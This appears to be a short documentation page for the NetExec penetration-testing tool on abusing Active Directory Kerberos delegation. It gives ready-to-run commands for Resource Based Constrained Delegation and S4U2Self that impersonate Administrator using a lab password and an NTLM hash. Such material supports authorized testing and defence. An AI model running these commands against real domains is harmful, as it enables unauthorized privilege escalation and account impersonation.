🆕Delegation

Resource Based Constrained Delegation (RBCD) and

RBCD

If you have an object with the msDS-AllowedToActOnBehalfOfOtherIdentity attribute set to an account you control you can use the impersonate flag inside NetExec to automatically execute the Resource Based Constrained Delegation and impersonate any user:

nxc smb 192.168.56.11 -u jon.snow -p iknownothing --delegate Administrator

S4U2Self

If you have a computer account you can (nearly) always get local administrator with the s4u2self extension:

nxc smb 192.168.56.10 -u 'KINGSLANDING$' -H 220fc1990391bdc183d1a68c389c0229 --delegate Administrator --self

Resources:

Last updated